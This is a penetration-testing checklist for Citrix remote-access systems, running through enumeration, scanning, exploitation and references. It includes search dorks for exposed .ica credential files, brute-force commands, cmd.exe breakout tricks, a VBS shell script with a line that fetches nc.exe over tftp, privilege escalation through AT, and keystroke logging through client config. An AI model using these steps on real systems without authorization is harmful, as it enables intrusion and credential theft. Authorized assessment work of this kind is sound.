Citrix Specific Testing:

---

Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/ penetration test of Citrix implementations.

Enumeration

• web search
  • Google (GHDB)
    • ext:ica
    • inurl:citrix/metaframexp/default/login.asp
    • [WFClient] Password= filetype:ica
    • inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
    • inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
    • inurl:/Citrix/Nfuse17/
    • inurl:Citrix/MetaFrame/default/default.aspx
  • Google Hacks
    • filetype:ica Username=
    • inurl:Citrix/AccessPlatform/auth/login.aspx
    • inurl:/Citrix/AccessPlatform/
    • inurl:LogonAgent/Login.asp
    • inurl:/CITRIX/NFUSE/default/login.asp
    • inurl:/Citrix/NFuse161/login.asp
    • inurl:/Citrix/NFuse16
    • inurl:/Citrix/NFuse151/
    • allintitle:MetaFrame XP Login
    • allintitle:MetaFrame Presentation Server Login
    • inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
    • allintitle:Citrix(R) NFuse(TM) Classic Login
      • allintitle:Citrix(R) NFuse(TM)
      • allintitle:Citrix(r) NFuse(tm) 1.6
      • allintitle:Citrix(R) NFuse(TM) Options
      • allintitle:Citrix(R) NFuse(TM) Innlogging
  • Yahoo
    • originurlextension:ica
• site search
  • Manual
    • review web page for useful information
    • review source for web page
• generic
  • nmap -A -PN -p 80,443,1494 ip_address
  • amap -bqv ip_address port_no.
• citrix specific
  • enum.pl
    • perl enum.pl ip_address
  • enum.js
    • enum.js apps TCPBrowserAdress=ip_address
  • connect.js
    • connect.js TCPBrowserAdress=ip_address Application=advertised-application
  • Citrix-pa-scan
    • perl pa-scan.pl ip_address [timeout] > pas.wri
  • pabrute.c
    • ./pabrute pubapp list app_list ip_address
• Default Ports
  • TCP
    • Citrix XML Service
      • 80
    • Advanced Management Console
      • 135
    • Citrix SSL Relay
      • 443
    • ICA sessions
      1494
  • Server to server
    • 2512
  • Management Console to server
    • 2513
  • Session Reliability (Auto-reconnect)
    • 2598
    • Note: - If 1494 is open, this would not normally be seen
  • License Management Console
    • 8082
  • License server
    • 27000
• UDP
  • Clients to ICA browser service
    • 1604
  • Server-to-server
    • 1604

nmap nse scripts

• citrix-enum-apps
  • nmap -sU --script=citrix-enum-apps -p 1604 <host>
• citrix-enum-apps-xml
  • nmap --script=citrix-enum-apps-xml -p 80,443 <host>
• citrix-enum-servers
  • nmap -sU --script=citrix-enum-servers -p 1604
• citrix-enum-servers-xml
  • nmap --script=citrix-enum-servers-xml -p 80,443 <host>
• citrix-brute-xml
  • nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

Scanning

Nessus

• Plugins
  • CGI abuses
    • NetScaler web management interface ip address cookie disclosure
  • CGI abuses : Cross Site Scripting (XSS)
    • Citrix MetaFrame XP login.asp
    • Citrix NFuse Launch Scripts
    • NetScaler web management XSS
  • Misc.
    • Citrix Published Applications Remote Enumeration
    • NetScaler web management cookie information
  • Service Detection
    • Citrix Licensing Server detection
    • Citrix Server detection
  • Web Servers
    • Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
    • NetScaler web management cookie cipher weakness
    • NetScaler web management interface detection
    • Unencrypted NetScaler web management interface
  • Windows
    • Citrix Licensing Server License Management Console
    • Citrix Password Manager Agent Secondary Credential Information Disclosurey
    • Citrix Password Manager Service Stored Credentials Disclosure
    • Citrix Presentation Server Remote Code Execution
    • Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service
    • Citrix web interface 4.6, 5.0, 5.0.1 XSS
    • Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
    • NetScaler web management cookie cipher weakness
    • NetScaler web management interface detection
    • NetScaler web management login
    • Unencrypted NetScaler web management interface

Nikto

• perl nikto.pl -host ip_address -port port_no.

  • Note: - It is possible to grep all Citrix/ NFuse/ NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file replacing the local version in nikto\plugins directory should you wish to specifically limit your enumeration to Citrix vulnerabilties. As of 1 Oct 09, there are currently 9 specific tests meeting these requirements.

Exploitation

• Alter default .ica files
  • InitialProgram=cmd.exe
  • InitialProgram=c:\windows\system32\cmd.exe
  • InitialProgram=explorer.exe
• Enumerate and Connect
  • For applications identified by Citrix-pa-scan
    • Pas
      • Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
      • Writes output to pas_results.wri
  • For published applications with a Citrix client when the master browser is non-public.
    • Citrix-pa-proxy
      • pa-proxy.pl IP_to_proxy_to (i.e. remote server) 127.0.0.1
• Manual Testing
  • Create Batch File (cmd.bat)
    • • cmd.exe
    • • echo off
      • command
      • echo on
  • Host Scripting File (cmd.vbs)
    • Option Explicit
    • Dim objShell
    • Set objShell = CreateObject("WScript.Shell")
    • objShell.Run "%comspec% /k"
    • WScript.Quit
    • alternative functionality
      • objShell.Run "%comspec% /k c: & dir"
      • objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
      • objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
  • iKat
    • Integrated Kiosk Attack Tool
      • Reconnaissance
      • FileSystem Links
      • Common Dialogs
      • Application Handlers
      • Browser Plugins
      • iKAT Tools
  • AT Command - priviledge escalation
    • AT HH:MM /interactive "cmd.exe"
    • AT HH:MM /interactive %comspec% /k

    • Note: - AT by default runs as system and although enabled for a normal user, will only work with these privileges for an admin, however, still worth a try.

  • Keyboard Shortcuts/ Hotkeys
    • Ctrl + h – View History
    • Ctrl + n – New Browser
    • Shift + Left Click – New Browser
    • Ctrl + o – Internet Address (browse feature)
    • Ctrl + p – Print (to file)
    • Right Click (Shift + F10)
      • Save Image As
      • View Source
    • F1 – Jump to URL
    • SHIFT+F1: Local Task List
    • SHIFT+F2: Toggle Title Bar
    • SHIFT+F3: Close Remote Application
    • CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
    • CTRL+F2: Remote Task List
    • CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
    • ALT+F2: Cycle through programs
    • ALT+PLUS: Alt+TAB
    • ALT+MINUS: ALT+SHIFT+TAB

• Brute Force
  • bforce.js
    • bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
    • bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

    • bforce.js TCPBrowserAddress=ip-address usernames=user1,user2 passwords=pass1,pass2 timeout=5000

  • Review Configuration Files

    • Application server configuration file
      • appsrv.ini
        • Location
          • <profile path>\Application Data\ICAClient
          • /usr/lib/ICAClient/config/appsrv.ini
          • $HOME/.ICAClient/appsrv.ini
          • Other ...
        • World writeable
          • Citrix Server Allows Key Logging Functionality
            • scancodes.pl
              • perl scancodes.pl wfcwin32.log
            • LogKeyboard=On
            • LogAppend=On
        • Review other files
          • wfcwin32.log
            • <profile path>\Application Data\ICAClient
            • Other ...
        • Sample file
    • Program Neighborhood configuration file
      • pn.ini
        • Location
          • <profile path>\Application Data\ICAClient
          • /usr/lib/ICAClient/config/pn.ini
          • Other ...
        • Review other files
          • .idx files
            • Mini-database containing published apps available
          • .vl files
            • The encrypted username, password, and domain name
        • Sample file
    • Citrix ICA client configuration file
      • wfclient.ini
        • Location
          • <profile path>\Application Data\ICAClient
          • /usr/lib/ICAClient/config/wfclient. ini
          • $HOME/.ICAClient/wfclient.ini
          • Other ...
        • Sample file

  References

  • Vulnerabilities
    • Art of Hacking
    • Common Vulnerabilities and Exploits (CVE)

      • Vulnerabilties and exploit information relating to these products can be found here:

      • http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
    • OSVDB
      • http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
    • Secunia
      • http://secunia.com/advisories/search/?search=citrix
    • Security-database.com
      • http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
    • SecurityFocus
  • Support
    • Citrix
      • Knowledge Base
      • Forum
    • Thinworld
  • Exploits
    • Milw0rm
      • http://www.milw0rm.com/search.php
    • Art of Hacking
      • Citrix
  • Tutorials/ Presentations
    • Carnal0wnage
      • Carnal0wnage Blog: Citrix Hacking
    • Foundstone
      • Got Citrix, Hack IT
    • GNUCitizen
      • Hacking CITRIX - the forceful way
      • 0day: Hacking secured CITRIX from outside
      • CITRIX: Owning the Legitimate Backdoor
      • Remote Desktop Command Fixation Attacks
    • Packetstormsecurity
      • Hacking Citrix
    • Insomniac Security
      • Hacking Citrix
    • Aditya Sood
      • Rolling Balls - Can you hack clients
    • BlackHat
      • Client Side Security